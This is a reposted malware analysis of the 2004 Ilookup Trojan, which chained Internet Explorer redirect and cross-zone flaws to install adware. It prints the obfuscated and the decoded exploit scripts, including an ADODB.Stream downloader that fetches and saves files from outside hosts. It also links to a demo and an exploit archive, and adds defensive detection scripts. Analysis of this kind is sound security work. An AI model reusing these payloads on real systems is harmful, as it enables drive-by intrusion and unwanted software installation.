Latest IE vulnerability + how to use it! Only days after two "extremely critical" vulnerabilities were found, the IE browser has turned up yet another security hazard. If an IE user inadvertently clicks a specially crafted hyperlink, the attacker can gain control of that user's computer. Even an IE 6.0 with every patch applied is exposed to this attack.
The attacker's technique chains JavaScript, VBScript and PHP code to exploit several vulnerabilities in IE, including one newly discovered flaw for which no patch yet exists. The technique has been published on the net and is being discussed on several security mailing lists.
When the user clicks a malicious link in an e-mail or on a web page, the attacker installs a Trojan on the user's computer. The process is this: on the affected system, IE pops up a floating window containing an "iframe" tag that shows text or interactive content. That content misleads the user into believing the help file in the iframe comes from the user's own hard disk, but by then it is already downloading JavaScript and obtaining local privileges on the affected system. The JavaScript then runs a remote PHP file, which in turn downloads a Trojan onto the user's hard disk.
Anyone who wants the full analysis of this vulnerability and of how it is exploited can view it here:
http://62.131.86.111/analysis.htm
Because of network problems I have reposted it below.
An analysis of the Ilookup Trojan
updated 8-6
- the redirect issue is more like Thor's redirect than mindwarper's, since it also works outside of a dynamic iframe
- expanded on the iframe caching portion
updated 9-6
- renamed the title; ilookup would indeed appear to be unassociated with 180 Solutions
Introduction
Just when I thought it was safe to use Internet Explorer once more, I received an email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm that, according to him, used an exploit that affected fully patched Internet Explorer 6 browsers. Being rather skeptical, I carelessly clicked on the link, only to witness how it automatically installed adware on my PC!!!
Now, there had been reports about 0day exploits making the rounds for quite some time, like for instance this post:
http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0
However, I hadn't seen any evidence to support this up until now.
Thor Larholm, as usual, added to the confusion by deliberately spreading disinformation, as seen in this post:
http://seclists.org/lists/bugtraq/2004/May/0153.html
attributing it to, and I quote, "just one of the remaining IE vulnerabilities that are not yet patched".
This analysis will show that there are at least 2 new and, afaik, unpublished exploits (feel free to prove me wrong) out there in the wild, one of them very sophisticated.
Analysis
Brace yourselves, this is some serious handiwork. The first page we encounter, installer.htm, looks like this:
<HTML><BODY>
<SCRIPT language="JScript.Encode">#@~^/gAAAA==@#@&@#@&7lMP:HVK^P{P[W1EhnYR^GmmYkKU tM+6i@#@&hz^W^{m.D,'~hHVW^ kwskDcrgE*i@#@&:HDW{mD.P{Phz^Wmcdw^kYvE_D0r#I@#@&@#@&:zVK^P{Phz^WmmCMD,!YI@#@&-mD,:XM+6~',:zD0mCMD$8Di@#@&@#@&-CD,:HVnxLO4PxPvhX^W^^+xLO4PRP8f*i@#@&:HVW1P{~:HVGmc/;8kYDvT~sXVULY4#p@#@&wEoAAA==^#~@</SCRIPT>
<Script language="JScript.Encode">#@~^GAIAAA==@#@&\CMPsX/DD,xPvEU+kmC2`JufZkmDb2O]y!^lUo;CT+Y&GYy9C-m/m.raYY yY22YZfu!b6E ^YbWU]y!(UN+mDnNGEDbULINbDnmOrKxY RYO]T9u!bYTG]Tbu{~]TG]Zb]Z,k4WSHGNmV9rmVWTY R] Fh[R4Ys]+GY+;hrx9Ghu /Yy NrC^WLKK2u&)FZ!!Z]l/]2A[kmVGLd+0DY&zOFZTT!u*;]fA[rmVGo_nkTtOY2bFYX;]fA9rmVGTbNY4]2)Fu*/]2AY+y] OVKmlDrGxu&G]+!Y+yLC\mdmMk2Ou&bY+F]fZU/"qK:]y!?"Zuffu*/]lZY+FJ#,QPsXVK^~_,E+dmC2`E/4nV^/^.bwYmsKl[+MmN/ ata]&wDW]2fE#,_~hHD+6~_,Exd^la+vJY*/YlZY FY&A]f/u*Z&j;I(n:Y22YyGu!u ZY y]fAu!9YZb]Z9]Zb]F9Y!G]ZbY&/&km.kaO]22Eb*i@#@&[Km;:UDRAMkD+`sXkOD*i@#@&OZoAAA==^#~@</Script>
<SCRIPT language="JScript.Encode">#@~^VQEAAA==@#@&@#@&6E mYbW ~hbx[WS)lGEx^Gl9`#@#@&`@#@&@#@&d.+O;Mx~0ms/i@#@&@#@&8@#@&@#@&d+DPb:nKED`JsXbWDm:nR6n^UmDb2YvqxNn^YNGE.kUL"+[kMnmDkGUcYWjOMkUovb*JS8!Z#i@#@&knY:kh+KEOcrd:Hr0Ml:n6mUm.k2OvB(xNnmD+[9!DkUL"+[kMn1YrKxv#B*drSFZFbi@#@&[G1E:UYchDbOn`E@!&s]b\3,q9'szk6DChP1)\A'hXbWMlhPUIZ{JMnNbDw4wE~qqf:u'y!!,u3qVC:'+!T@*@!z(s")HA@*vbp@#@&wmMAAA==^#~@</SCRIPT>
</BODY></HTML>
The JavaScript code is encoded using the Windows Script Encoder (screnc.exe), a Microsoft tool that can be used to encode your scripts. This encoding only prevents casual viewing of the code and is easily defeated. If you have a few minutes to spare you can write your own decoder, or if you're lazy download a precompiled one from here: http://www.virtualconspiracy.com/scrdec.html You'll see this encoding used throughout the entire exploit as a way to obfuscate its function and avoid detection by virus scanners. Decoded, installer.htm reads as follows:
<html><body>
<script language="javascript">
var myloc = document.location.href;
myloc_arr = myloc.split("?");
myref_arr = myloc.split("?ref");
myloc = myloc_arr[0];
var myref = myref_arr[1];
var mylength = (myloc.length - 13);
myloc = myloc.substr(0,mylength);
</script>
<script language="javascript">
var mystr = (unescape("%3Cscript%20language%3D%22Javascript%22%3E%0D%0Afunction%20InjectedDuringRedirection%28%29%0D%0A%0D%0A%7B%0D%0A%09showModalDialog%28%27md.htm%27%2Cwindow%2C%22dialogTop%3A-10000%5C%3BdialogLeft%3A-10000%5C%3BdialogHeight%3A1%5C%3BdialogWidth%3A1%5C%3B%22%29.location%3D%20%22javascript%3A%27%3CSCRIPT%20SRC%3D%5C%5C%27") + myloc + unescape("shellscript_loader_js.php%3Fref%3D") + myref + unescape("%5C%5C%27%3E%3C%5C/script%3E%27%20%20%22%3B%0D%0A%0D%0A%7D%0D%0A%3C/script%3E"));
document.write(mystr);
</script>
<script language="javascript">
function window::onunload() { return false; }
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');
</script>
</body></html>
There are two things to note going on in this page.
1. In the third script block it loads redir.php in an iframe named myiframe.
This is a PHP script that loads ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm in an iframe. This shouldn't be happening: from Internet Explorer 6 SP1 on, access to the local file system from a web page is disallowed. Looking at the headers, it appears to be a variation of Thor's redirect, which had long been patched; the new element is the URL: prefix, which makes it work once more:
HTTP/1.1 302 Found
Date: Sat, 05 Jun 2004 21:24:19 GMT
Server: Apache/1.3.28 (Unix) mod_fastcgi/2.4.0 PHP/4.3.5
X-Powered-By: PHP/4.3.5
Location: URL:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
This file is located on the user's hard disk. Web pages accessed from the local computer are placed in the Local Machine zone, where they have the fewest security restrictions, since local content is considered to be secure. However, a lot of recent exploits have taken advantage of the Local Machine zone to elevate their privileges and compromise a computer. So by now we can see where this is heading: it's the same modus operandi we've seen over and over in the past months, and it goes something like this:
1. Find a cross-zone scripting exploit.
2. Load a local, trusted resource in an iframe.
3. Inject JavaScript code into the trusted iframe using the cross-zone scripting exploit to take over the computer, using the adodb.stream issue for instance.
Another thing to note is that redir.php is deliberately not served immediately: it waits about 1.5 seconds before doing the redirect.
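The Location header above is the whole of the first new trick, so here is a small check, added for this write-up and not part of the original analysis or of the Trojan, that a proxy or log parser could run over a captured response head: it parses the status line and headers, strips any URL: wrapper the way the bypass relies on IE doing, and flags a redirect whose effective scheme points at local content. The sample response is the redir.php one quoted above; the list of local schemes, the drive-letter rule and the parser itself are this example's own choices.

```javascript
// Added example: flag HTTP redirects that land in IE's Local Machine zone.
// Schemes that resolve to local content in IE of this era (example's own
// list; extend as needed). "mk" covers mk:@MSITStore: URLs.
const LOCAL_SCHEMES = ["ms-its", "its", "mk", "file", "res"];

// Split a raw response head into a status code and a lower-cased header map.
function parseResponseHead(raw) {
  const lines = raw.split(/\r?\n/).filter((l) => l.length > 0);
  const status = lines.shift() || "";
  const headers = {};
  for (const line of lines) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  const m = /^HTTP\/\d\.\d\s+(\d{3})/.exec(status);
  return { code: m ? parseInt(m[1], 10) : 0, headers };
}

// The bypass: a leading "URL:" hides the real scheme from a filter that only
// looks at the first characters, while IE still follows the wrapped target.
// Peel the prefix repeatedly, case-insensitively, so nested wrappers fail too.
function normaliseLocation(value) {
  let v = value.trim();
  for (;;) {
    const m = /^url:\s*/i.exec(v);
    if (!m) break;
    v = v.slice(m[0].length);
  }
  return v;
}

function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Returns { redirect, target, scheme, suspicious, reason } for one response head.
function checkRedirect(raw) {
  const { code, headers } = parseResponseHead(raw);
  const loc = headers["location"];
  if (!(code >= 300 && code < 400) || loc === undefined) {
    return { redirect: false, target: null, scheme: null, suspicious: false, reason: "no redirect" };
  }
  const target = normaliseLocation(loc);
  const scheme = schemeOf(target);
  if (loc !== target) {
    // A "URL:" wrapper has no legitimate use in a Location header.
    return { redirect: true, target, scheme, suspicious: true, reason: "URL: prefix wrapper" };
  }
  if (scheme !== null && scheme.length === 1) {
    // "C:\..." parses as scheme "C": a bare drive path, i.e. a local file.
    return { redirect: true, target, scheme, suspicious: true, reason: "drive letter path" };
  }
  if (scheme !== null && LOCAL_SCHEMES.includes(scheme)) {
    return { redirect: true, target, scheme, suspicious: true, reason: "local scheme " + scheme };
  }
  // Relative targets resolve against the issuing origin; remote schemes are fine here.
  return { redirect: true, target, scheme, suspicious: false, reason: scheme ? "remote " + scheme : "relative" };
}

// Constructed from the redir.php response quoted in the analysis.
const REDIR_PHP_RESPONSE =
  "HTTP/1.1 302 Found\r\n" +
  "Date: Sat, 05 Jun 2004 21:24:19 GMT\r\n" +
  "Server: Apache/1.3.28 (Unix) mod_fastcgi/2.4.0 PHP/4.3.5\r\n" +
  "X-Powered-By: PHP/4.3.5\r\n" +
  "Location: URL:ms-its:C:\\WINDOWS\\Help\\iexplore.chm::/iegetsrt.htm\r\n" +
  "Connection: close\r\n" +
  "Transfer-Encoding: chunked\r\n" +
  "Content-Type: text/html\r\n";

// Constructed benign redirect for comparison.
const BENIGN_RESPONSE = "HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\n";

console.log(checkRedirect(REDIR_PHP_RESPONSE));
console.log(checkRedirect(BENIGN_RESPONSE));
```

Note that the check deliberately treats any URL: wrapper as suspicious on its own, independent of the scheme behind it, since the wrapper exists only to confuse a scheme check.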
Now, up until now I didn't think there were any more cross-zone scripting exploits around; for sure there hasn't been one reported to bugtraq or any other security-related list I am subscribed to (afaik anyway). So let's dig deeper, shall we?
2. In the second script block it displays a modal dialog.
mystr is URL-encoded; when we decode it we get something approximating this:
<script language="Javascript">
function InjectedDuringRedirection()
{
	showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'***MYLOC_HERE***shellscript_loader_js.php?ref=***MYREF_HERE***\\'><\/script>'";
}
</script>
As you can see, it initially loads a file called md.htm in a modal dialog. This file contains yet more encoded scripting:
<SCRIPT language="JScript.Encode">#@~^7AAAAA==@#@&hr NKhRM+D;D .CV!+~x,hk[WSRNbCsWTbMo;:nUD/I@#@&@#@&6EU^DkWU~;tnm0jDlO!/v#@#@&dP@#@&idODH Onsw.m.'Skx9GAR9kmVGo).TEh+O/cVG^mYkGUct.+6I)mCDm4`+* Srx9WAR1VGd`#pN@#@&ddknOKb:W;YcE;tnm0jYmY;dv#JSqZ!bi@#@&i8@#@&d@#@&Z4+1V?DlOEk`bI@#@&y0cAAA==^#~@</SCRIPT>
which, when decoded, becomes:
<SCRIPT language="javascript">
window.returnValue = window.dialogArguments;
function CheckStatus(){
  try{ tempVar=window.dialogArguments.location.href; }catch(e){ window.close(); }
  setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCRIPT>
OK, let's see what we've got. The dialog argument passed to md.htm is the window that opened it. md.htm caches this object (and hands it back as its returnValue), then checks every 100 ms whether it can still access the location object of that window. As soon as the domain changes, the access throws a security exception and the dialog closes itself, so showModalDialog() returns the cached window reference to the caller, which sets its location to:
javascript:'<SCRIPT SRC=\\'***MYLOC_HERE***shellscript_loader_js.php?ref=***MYREF_HERE***\\'><\/script>'";
Which means the document in that window gets dropped and is replaced by a script include called shellscript_loader_js.php, which looks like this:
function getRealShell() {
  myiframe.document.write("<SCRIPT SRC='http://216.130.188.219/ei2/shellscript_js.php?ref=undefined'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
OK, as you can see this script includes another script called shellscript_js.php, which looks like this:
document.write(
unescape("%3CSCRIPT%20LANGUAGE%3D%22JAVASCRIPT%22%3E%0D%0A%20%20%20%20function%20getPath%28%29%20%7B%20%0D%0A%20%20%20%20/*ending%20with%20%22/%22*/%0D%0A%20%20%20%20return%20%22http://216.130.188.219/ei2%22%3B%0D%0A%20%20%20%20%7D%0D%0A%0D%0A%20%20%20%20function%20getRef%28%29%20%7B%20%0D%0A%20%20%20%20/*ending%20with%20%22/%22*/%0D%0A%20%20%20%20return%20%22undefined%22%3B%0D%0A%20%20%20%20%7D%0D%0A%3C/SCRIPT%3E")+
unescape("%3Cscript%20language%3D%22JScript.Encode%22%3E%23@%7E%5EHQQAAA%3D%3D@%23@%26P%7E%2CP1l4alD4P%7BPEZ%3D-wr%09/YmsVcml%28EI@%23@%26P%2CP%7EtOh%5EwCY4%7E%27%2CJ/l%27-kUdDlsVc4D%3AEp@%23@%26PP%2CP1C4%60IJP%7BPE4DYw%3D%26zDWW%5E8CDyRbOsWGV%21w%20mKhzDWGs%28lD+%26SkUN%7F%5E2%20%201l%28Ji@%23@%26%2C%7EP%2CtO%3A%5Ej%5DJ%2C%27PTnYhlY4cbP3PrzrxdOmVsRa4wQDnW%7BJPQ%7ET+OI%7FWv%23I@%23@%26@%23@%26P%2CP%2C-lMPamm4%7Ex%2Cx+S%7Eb1Yk7npr%28L%7FmO%60E%5Cbm.WkG0DRp%5CdCKPKr%23IP@%23@%26%2CP%7E%2C61l4cranxvJ%212%3AJS%5Em4j%22J%7EZ%23i%2C@%23@%26P%2CP%2C6%5El8%20U+UNvbi%2C@%23@%26%7E%2CPP@%23@%26%2CP%7EP7CMPd1l%28P%27%2Cx%7FAPzmOk7+p6%28L+1O%60rbf%7D9%24RUYM+C%3AEbp@%23@%26P%2C%7EPkmC8cHW%5Bn%2C%27%7E%26p@%23@%26P%7E%2CPkml%28R%3Azw%7FPxP8i@%23@%26%2CPP%2Cdmm4R%7D2nxv%23p@%23@%26P%7E%7E%2C/%5El%28%20%7FMkOnv6mC8cDn/aG%09/n%7EW9X%23p@%23@%26%7EP%2CPdmm4%20jm%5C+%3AGsbV+v%5EC4alDtS%20bI@%23@%26%7EP%2C%7E@%23@%26P%7E%7E%2C%5Cl.%7EXtO%3A%2Cx%2CxnSPzmYb%5C%7Fpr%28LnmD%60E%5CbmDKdW6YRo%5CJC%3AKhJbi%7E@%23@%26P%7EP%2CatD%3A%206a+xcEV2PJB4D%3As%60Id%7E%21*i%2C@%23@%26%2CP%7EPXtOhc%3F+%09%5B%60*iP@%23@%26%7EP%2CP@%23@%26%7EP%7E%7E7l.Pk4YsV%7Ex%2Cx+A%7EzmOk7nor8N+1Y%60rbG6f%7ERjYM+Chr%23i@%23@%26P%2CPPk4O%3A%5ERtW%5B+%7Ex%2C%26I@%23@%26%7EP%2CPd4D%3AV%20PHwnP%7B%7E8i@%23@%26P%2CPPktDhVcr2+%09%60bI@%23@%26P%2C%7EPktYss%20%7FMkD+c64OsR.+k2W%09/n%24KNXbI@%23@%26%7EP%2C%7EktOsVc%3Fl7+%3AGsbVn%604YhsalY4S%20*i@%23@%26@%23@%26P%2CP%2ChxhrU9WARK2+%09%60E/%3D--rUkYCV%5E%204Yhr%7E%2CBNK%7BbU/DlsVE%7E%7EvDWW%5E8lM%27%21Bhnx%214mDx%21Sd1DGV%5E8lM/xTB/YCO%21/x%21B.%7F/r.l%28V+%7B%21BAk9Y4%27y%21S4%7Fko4O%27y%21%7E%2COGw%7B%26Z%21T%21S%7E%5E+WY%7Bq%21BBbI@%23@%26P%7E%7E%2C/nV6%20%5EW%5EmYbWxctMn0%2C%27%7EJm4G%3BD%294%5ECx0Ji@%23@%26eiMBAA%3D%3D%5E%23%7E@%3C/script%3E"));
When we URL-decode it, it looks like this:
<SCRIPT language="javascript"> function getPath() { /*ending with "/"*/ return "http://216.130.188.219/ei2"; } function getRef() { /*ending with "/"*/ return "undefined"; }</SCRIPT>
<script language="JScript.Encode">#@~^HQQAAA==@#@&P~,P1l4alD4P{PEZ=-wr /YmsVcml(EI@#@&P,P~tOh^wCY4~',J/l'-kUdDlsVc4D:Ep@#@&PP,P1C4`IJP{PE4DYw=&zDWW^8CDyRbOsWGV!wmKhzDWGs(lD+&SkUN^2 1l(Ji@#@&,~P,tO:^j]J,'PTnYhlY4cbP3PrzrxdOmVsRa4wQDnW{JPQ~T+OIWv#I@#@&@#@&P,P,-lMPamm4~x,x+S~b1Yk7npr(LmO`E\bm.WkG0DRp\dCKPKr#IP@#@&,P~,61l4cranxvJ!2:JS^m4j"J~Z#i,@#@&P,P,6^l8U+UNvbi,@#@&~,PP@#@&,P~P7CMPd1l(P',xAPzmOk7+p6(L+1O`rbf}9$RUYM+C:Ebp@#@&P,~PkmC8cHW[n,'~&p@#@&P~,Pkml(R:zwPxP8i@#@&,PP,dmm4R}2nxv#p@#@&P~~,/^l( MkOnv6mC8cDn/aG /n~W9X#p@#@&~P,Pdmm4 jm\+:GsbV+v^C4alDtS bI@#@&~P,~@#@&P~~,\l.~XtO:,x,xnSPzmYb\pr(LnmD`E\bmDKdW6YRo\JC:KhJbi~@#@&P~P,atD:6a+xcEV2PJB4D:s`Id~!*i,@#@&,P~PXtOhc?+ [`*iP@#@&~P,P@#@&~P~~7l.Pk4YsV~x,x+A~zmOk7nor8N+1Y`rbG6f~RjYM+Chr#i@#@&P,PPk4O:^RtW[+~x,&I@#@&~P,Pd4D:V PHwnP{~8i@#@&P,PPktDhVcr2+ `bI@#@&P,~PktYss MkD+c64OsR.+k2W /n$KNXbI@#@&~P,~ktOsVc?l7+:GsbVn`4YhsalY4S *i@#@&@#@&P,P,hxhrU9WARK2+ `E/=--rUkYCV^4Yhr~,BNK{bU/DlsVE~~vDWW^8lM'!Bhnx!4mDx!Sd1DGV^8lM/xTB/YCO!/x!B./r.l(V+{!BAk9Y4'y!S4ko4O'y!~,OGw{&Z!T!S~^+WY{q!BBbI@#@&P~~,/nV6^W^mYbWxctMn0,'~Jm4G;D)4^Cx0Ji@#@&eiMBAA==^#~@</script>
And when we finally remove the script encoding it looks like this, which we immediately recognize as the adodb.stream issue I reported on Aug 26 2003!! (ed.: Microsoft, where's the patch??)
<script language="javascript">
function getPath() { /*ending with "/"*/ return "http://216.130.188.219/ei2"; }
function getRef() { /*ending with "/"*/ return "undefined"; }
</script>
<script language="javascript">
cabpath = "C:\\install.cab";
htmlpath = "C:\\install.htm";
cabURL = "http://toolbar2.i-lookup.com/toolbar2/windec32.cab";
htmlURL = getPath() + "/install.php?ref=" + getRef();

// Fetch the cab synchronously and write the raw bytes to disk.
// ADODB.Stream: Mode 3 = read/write, Type 1 = binary, SaveToFile option 2 = create/overwrite.
var xcab = new ActiveXObject("Microsoft.XMLHTTP");
xcab.Open("GET",cabURL,0);
xcab.Send();
var scab = new ActiveXObject("ADODB.Stream");
scab.Mode = 3;
scab.Type = 1;
scab.Open();
scab.Write(xcab.responseBody);
scab.SaveToFile(cabpath,2);

// Same for the install page that will be opened from the local disk.
var xhtm = new ActiveXObject("Microsoft.XMLHTTP");
xhtm.Open("GET",htmlURL,0);
xhtm.Send();
var shtml = new ActiveXObject("ADODB.Stream");
shtml.Mode = 3;
shtml.Type = 1;
shtml.Open();
shtml.Write(xhtm.responseBody);
shtml.SaveToFile(htmlpath,2);

// Open the dropped page from C:\ (Local Machine zone), off-screen, then blank this one.
w=window.open("C:\\install.htm", 'do_install','toolbar=0,menubar=0,scrollbars=0,status=0,resizable=0,width=20,height=20, top=30000,left=10,');
self.location.href = "about:blank";
</script>
When run in the Local Machine zone this script downloads two files to disk and runs them, thus installing the ilookup toolbar:
http://toolbar2.i-lookup.com/toolbar2/windec32.cab to C:\install.cab
http://216.130.188.219/ei2/install.php to C:\install.htm
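To make the point about obfuscation concrete: shellscript_js.php reaches the browser as document.write(unescape("...")) with a JScript.Encode block inside, and the ActiveX names that would trip a string-matching scanner only appear after both layers are removed. The scanner below is an added example, not code from the analysis or from the Trojan. It peels the unescape() layers by decoding %XX and %uXXXX escapes until the text stops changing, then reports the #@~^ ... ^#~@ Script Encoder blocks that surface and whether any of the tell-tale ActiveX names are already visible in plain text; decoding the Script Encoder cipher itself is left to a tool such as scrdec. The sample page is constructed for this example and its "encoded" body is a placeholder, not real screnc output.

```javascript
// Added example: strip the unescape() obfuscation layer and locate Script
// Encoder blocks, so the remaining layer can be handed to a real decoder.

// Decode %XX and %uXXXX sequences the way the legacy unescape() does.
function percentDecode(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Replace every unescape("...") / unescape('...') call with its decoded
// argument. Returns the rewritten text and how many calls were expanded.
function expandUnescapeCalls(text) {
  let count = 0;
  const out = text.replace(
    /unescape\s*\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g,
    (_, q, body) => {
      count++;
      return percentDecode(body);
    }
  );
  return { out, count };
}

// Expand until nothing changes (bounded, so a hostile page cannot loop us).
function peelLayers(text, maxLayers = 10) {
  let layers = 0;
  let cur = text;
  while (layers < maxLayers) {
    const { out, count } = expandUnescapeCalls(cur);
    if (count === 0) break;
    cur = out;
    layers++;
  }
  return { text: cur, layers };
}

// Script Encoder blocks start with "#@~^", six base64 characters and "==",
// and end with "^#~@" (the trailer carries a checksum we do not interpret).
function findEncodedBlocks(text) {
  const re = /#@~\^([A-Za-z0-9+/]{6})==([\s\S]*?)\^#~@/g;
  const blocks = [];
  let m;
  while ((m = re.exec(text)) !== null) {
    blocks.push({ header: m[1], body: m[2] });
  }
  return blocks;
}

// Names the final stage needs; if they are visible after peeling, the page
// is not even trying. If they are absent but encoded blocks are present,
// the Script Encoder layer is what is hiding them.
const PLAIN_MARKERS = ["ADODB.Stream", "Microsoft.XMLHTTP", "SaveToFile"];

function scanForEncodedPayload(html) {
  const { text, layers } = peelLayers(html);
  const blocks = findEncodedBlocks(text);
  const plainMarkers = PLAIN_MARKERS.filter((k) => text.indexOf(k) !== -1);
  return { layers, encodedBlocks: blocks.length, plainMarkers, decoded: text };
}

// Constructed sample in the shape of shellscript_js.php: one document.write
// of two unescape() literals, the second carrying a placeholder encoded block.
const SAMPLE_PAGE =
  'document.write(\n' +
  '  unescape("%3CSCRIPT%20LANGUAGE%3D%22JAVASCRIPT%22%3E%20function%20getPath%28%29%20%7B%20return%20%22http://example.invalid/ei2%22%3B%20%7D%3C/SCRIPT%3E") +\n' +
  '  unescape("%3Cscript%20language%3D%22JScript.Encode%22%3E%23@%7E%5EAAAAAA%3D%3D@%23@%26PLACEHOLDER%20ENCODED%20BODY%20%5E%23%7E@%3C/script%3E"));\n';

console.log(scanForEncodedPayload(SAMPLE_PAGE));
```

On the sample this reports one unescape layer, one encoded block and no plain-text markers, which is exactly the situation a signature scanner faces with the real page: nothing to match until the Script Encoder layer is removed as well.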
Let's reflect on what we've seen and attempt a reconstruction.
1. redir.php is requested by the iframe but not served immediately, because the PHP script introduces a 1.5-second delay.
2. setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100); InjectedDuringRedirection.toString() is the source text of the function, so nothing is executed yet; the function is merely defined in the window object associated with the iframe.
3. setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101); calls the function defined in step 2 inside the iframe's window.
4. This function creates a modal dialog and passes window as the dialog argument. Because it is invoked through the iframe's execScript method, window is not the top-level window but the window of the iframe that was just created dynamically.
5. redir.php completes loading and redirects to the local help file.
6. md.htm can no longer access the location object of the iframe and throws an exception, which causes the modal dialog to close.
7. InjectedDuringRedirection now resumes where it had blocked on the modal dialog call. The call returns the cached iframe window object from before the redirect changed its location. Because InjectedDuringRedirection was called via myiframe.execScript and myiframe's contents have just changed, the old document is gone and the new one hasn't been set yet; yet the location of the iframe can still be changed through the cached reference, which shouldn't be possible!! So what they proceed to do is set the location on the cached reference to the iframe like this:
.location="javascript:'<SCRIPT SRC=\\'***MYLOC_HERE***shellscript_loader_js.php?ref=***MYREF_HERE***\\'><\/script>'";
This writes everything between the quotes into the body of the document, which is now effectively in the Local Machine zone. Apparently Internet Explorer has some kind of safeguard for documents whose URL is "javascript: ...", so that document can't be accessed directly, but any iframe opened from it is in the Local Machine zone. Yes, that makes sense, doesn't it? Well, blame Microsoft.
8. shellscript_loader_js.php now creates an iframe, which is regarded as being in the Local Machine zone, and includes the final script shellscript_js.php, which is run from there.
9. shellscript_js.php uses the adodb.stream bug, which only works in the Local Machine zone, to download and start two files.
Conclusion
What have we learned?
The Trojan uses several known and two previously unknown vulnerabilities in Internet Explorer,
the unknown ones being:
1. Location: URL: allows access to local resources
2. A cross-zone access vulnerability
The latter being quite non-trivial (whoever created this beast sure knew what he was doing, but although I have the utmost respect for your work, you're still a scumbag for perverting it in this fashion)
to install the ilookup toolbar from http://toolbar2.i-lookup.com/toolbar2/windec32.cab
Demonstration
A cleaned-up, harmless demonstration of the techniques used in this exploit can be found here:
http://62.131.86.111/security/idiots/repro/installer.htm
People who have not installed Internet Explorer Service Pack 1 can click here:
http://62.131.86.111/security/idiots/repro/sp0/installer.htm
Alternatively you can download the files for the exploit here: http://62.131.86.111/security/idiots/repro/exploit.zip